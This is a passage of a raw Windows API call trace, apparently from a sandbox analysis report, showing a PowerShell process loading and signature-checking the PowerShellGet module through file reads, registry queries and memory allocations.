nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebe6b8, lpOverlapped=0x0 | out: lpBuffer=0x6bbb418*, lpNumberOfBytesRead=0x4ebe6b8*=0x1000, lpOverlapped=0x0) returned 1 [0088.170] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebe68c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebe68c*=0) returned 0x1000 [0088.170] ReadFile (in: hFile=0x468, lpBuffer=0x6bbb418, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebe6b8, lpOverlapped=0x0 | out: lpBuffer=0x6bbb418*, lpNumberOfBytesRead=0x4ebe6b8*=0xde, lpOverlapped=0x0) returned 1 [0088.170] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebe68c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebe68c*=0) returned 0x10de [0088.170] ReadFile (in: hFile=0x468, lpBuffer=0x6bbb418, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebe6b8, lpOverlapped=0x0 | out: lpBuffer=0x6bbb418*, lpNumberOfBytesRead=0x4ebe6b8*=0x0, lpOverlapped=0x0) returned 1 [0088.170] NtQuerySystemInformation (in: SystemInformationClass=0xa4, SystemInformation=0x4ebe620, Length=0x20, ResultLength=0x4ebe690 | out: SystemInformation=0x4ebe620, ResultLength=0x4ebe690*=0x0) returned 0xc0000003 [0088.171] GetSystemInfo (in: lpSystemInfo=0x4ebe69c | out: lpSystemInfo=0x4ebe69c*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0088.171] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x4ebe62c | out: phkResult=0x4ebe62c*=0x4f0) returned 0x0 [0088.171] RegQueryValueExW (in: hKey=0x4f0, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x4ebe648, lpData=0x0, lpcbData=0x4ebe644*=0x0 | out: lpType=0x4ebe648*=0x0, lpData=0x0, lpcbData=0x4ebe644*=0x0) returned 0x2 [0088.171] RegCloseKey (hKey=0x4f0) returned 0x0 [0088.171] CloseHandle (hObject=0x468) returned 1 [0088.173] CoCreateGuid (in: pguid=0x4ebe71c | out: pguid=0x4ebe71c*(Data1=0x571c508, Data2=0x9c52, Data3=0x4a23, Data4=([0]=0xaa, [1]=0x0, [2]=0xd3, [3]=0x7e, [4]=0xb, [5]=0x56, [6]=0x79, [7]=0x46))) returned 0x0 [0088.178] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebe47c | out: lpPerformanceCount=0x4ebe47c*=1641099451797) returned 1 [0088.178] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0088.178] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x54, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x53 [0088.178] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebe168) returned 1 [0088.178] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\powershellget.psd1"), fInfoLevelId=0x0, lpFileInformation=0x4ebe42c | out: lpFileInformation=0x4ebe42c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24e3d340, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x1c7d2120, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x1c7d2120, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x10de)) returned 1 [0088.178] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebe164) returned 1 [0088.178] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0088.178] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x54, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x53 [0088.180] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0088.180] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x54, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x53 [0088.180] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebe0fc) returned 1 [0088.180] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\powershellget.psd1"), fInfoLevelId=0x0, lpFileInformation=0x4ebe3c0 | out: lpFileInformation=0x4ebe3c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24e3d340, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x1c7d2120, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x1c7d2120, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x10de)) returned 1 [0088.180] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebe0f8) returned 1 [0088.180] CoTaskMemAlloc (cb=0x10) returned 0x425e718 [0088.180] CoTaskMemAlloc (cb=0x10) returned 0x425e670 [0088.180] CoTaskMemAlloc (cb=0xa8) returned 0x2d4c70 [0088.180] CoTaskMemAlloc (cb=0x30) returned 0x349cd0 [0088.180] WinVerifyTrust () returned 0x800b0100 [0088.191] CoTaskMemFree (pv=0x425e718) [0088.191] CoTaskMemFree (pv=0x349cd0) [0088.191] CryptCATHandleFromStore () returned 0x2bf9b8 [0088.191] WTHelperGetProvSignerFromChain () returned 0x0 [0088.191] CoTaskMemAlloc (cb=0x10) returned 0x425e718 [0088.191] CoTaskMemAlloc (cb=0x30) returned 0x349cd0 [0088.191] WinVerifyTrust () returned 0x0 [0088.191] CoTaskMemFree (pv=0x349cd0) [0088.191] CoTaskMemFree (pv=0x425e718) [0088.191] CoTaskMemFree (pv=0x2d4c70) [0088.191] CoTaskMemFree (pv=0x425e670) [0088.256] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\en-US\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\en-us\\powershellget.psd1")) returned 0xffffffff [0088.257] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\en\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\en\\powershellget.psd1")) returned 0xffffffff [0088.266] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSModule.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\psmodule.psm1")) returned 0x20 [0088.270] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSModule.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\psmodule.psm1")) returned 0x20 [0088.273] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0088.273] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x54, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x53 [0088.273] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x41 [0088.273] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", nBufferLength=0x41, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", lpFilePart=0x0) returned 0x40 [0088.298] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x4ebddb8 | out: phkResult=0x4ebddb8*=0x468) returned 0x0 [0088.298] RegQueryValueExW (in: hKey=0x468, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x4ebddd8, lpData=0x0, lpcbData=0x4ebddd4*=0x0 | out: lpType=0x4ebddd8*=0x1, lpData=0x0, lpcbData=0x4ebddd4*=0x56) returned 0x0 [0088.298] RegQueryValueExW (in: hKey=0x468, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x4ebddd8, lpData=0x6be4f24, lpcbData=0x4ebddd4*=0x56 | out: lpType=0x4ebddd8*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x4ebddd4*=0x56) returned 0x0 [0088.298] RegCloseKey (hKey=0x468) returned 0x0 [0088.302] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSGet.Format.ps1xml" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\psget.format.ps1xml")) returned 0x20 [0088.307] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSGet.Format.ps1xml" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\psget.format.ps1xml")) returned 0x20 [0088.307] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSGet.Format.ps1xml" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\psget.format.ps1xml")) returned 0x20 [0088.308] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x4ebddb8 | out: phkResult=0x4ebddb8*=0x468) returned 0x0 [0088.308] RegQueryValueExW (in: hKey=0x468, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x4ebddd8, lpData=0x0, lpcbData=0x4ebddd4*=0x0 | out: lpType=0x4ebddd8*=0x1, lpData=0x0, lpcbData=0x4ebddd4*=0x56) returned 0x0 [0088.308] RegQueryValueExW (in: hKey=0x468, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x4ebddd8, lpData=0x6bf1e68, lpcbData=0x4ebddd4*=0x56 | out: lpType=0x4ebddd8*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x4ebddd4*=0x56) returned 0x0 [0088.308] RegCloseKey (hKey=0x468) returned 0x0 [0088.313] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSModule.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\psmodule.psm1")) returned 0x20 [0088.317] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSModule.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\psmodule.psm1")) returned 0x20 [0088.321] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSGet.Format.ps1xml" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\psget.format.ps1xml")) returned 0x20 [0088.327] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSGet.Format.ps1xml" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\psget.format.ps1xml")) returned 0x20 [0088.331] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSGet.Resource.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\psget.resource.psd1")) returned 0x20 [0088.335] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSGet.Resource.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\psget.resource.psd1")) returned 0x20 [0088.342] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSGetModuleInfo.xml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x55 [0088.342] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSGetModuleInfo.xml", nBufferLength=0x55, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSGetModuleInfo.xml", lpFilePart=0x0) returned 0x54 [0088.342] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebdbb8) returned 1 [0088.342] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSGetModuleInfo.xml" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\psgetmoduleinfo.xml"), fInfoLevelId=0x0, lpFileInformation=0x4ebde7c | out: lpFileInformation=0x4ebde7c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0088.342] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebdbb4) returned 1 [0088.344] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSModule.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\psmodule.psm1")) returned 0x20 [0088.389] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSModule.psm1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4f [0088.389] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSModule.psm1", nBufferLength=0x4f, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSModule.psm1", lpFilePart=0x0) returned 0x4e [0088.389] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebd6e0) returned 1 [0088.390] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSModule.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\psmodule.psm1"), fInfoLevelId=0x0, lpFileInformation=0x6c1f280 | out: lpFileInformation=0x6c1f280*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24e634a0, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x1c7d2120, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x1c7d2120, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x8caa9)) returned 1 [0088.390] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebd6dc) returned 1 [0088.390] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSModule.psm1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4f [0088.390] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSModule.psm1", nBufferLength=0x4f, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSModule.psm1", lpFilePart=0x0) returned 0x4e [0088.390] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebd884) returned 1 [0088.390] CreateFileW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSModule.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\psmodule.psm1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x468 [0088.391] GetFileType (hFile=0x468) returned 0x1 [0088.391] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebd880) returned 1 [0088.391] GetFileType (hFile=0x468) returned 0x1 [0088.391] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x0 [0088.391] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.393] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x1000 [0088.393] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.394] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x2000 [0088.395] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.395] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x3000 [0088.395] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.395] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x4000 [0088.395] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.396] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x5000 [0088.396] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.396] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x6000 [0088.396] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.397] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x7000 [0088.397] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.397] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x8000 [0088.397] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.397] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x9000 [0088.398] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.399] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0xa000 [0088.399] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.399] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0xb000 [0088.399] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.400] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0xc000 [0088.400] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.400] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0xd000 [0088.400] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.401] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0xe000 [0088.401] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.401] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0xf000 [0088.401] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.402] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x10000 [0088.402] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.402] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x11000 [0088.402] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.403] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x12000 [0088.403] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 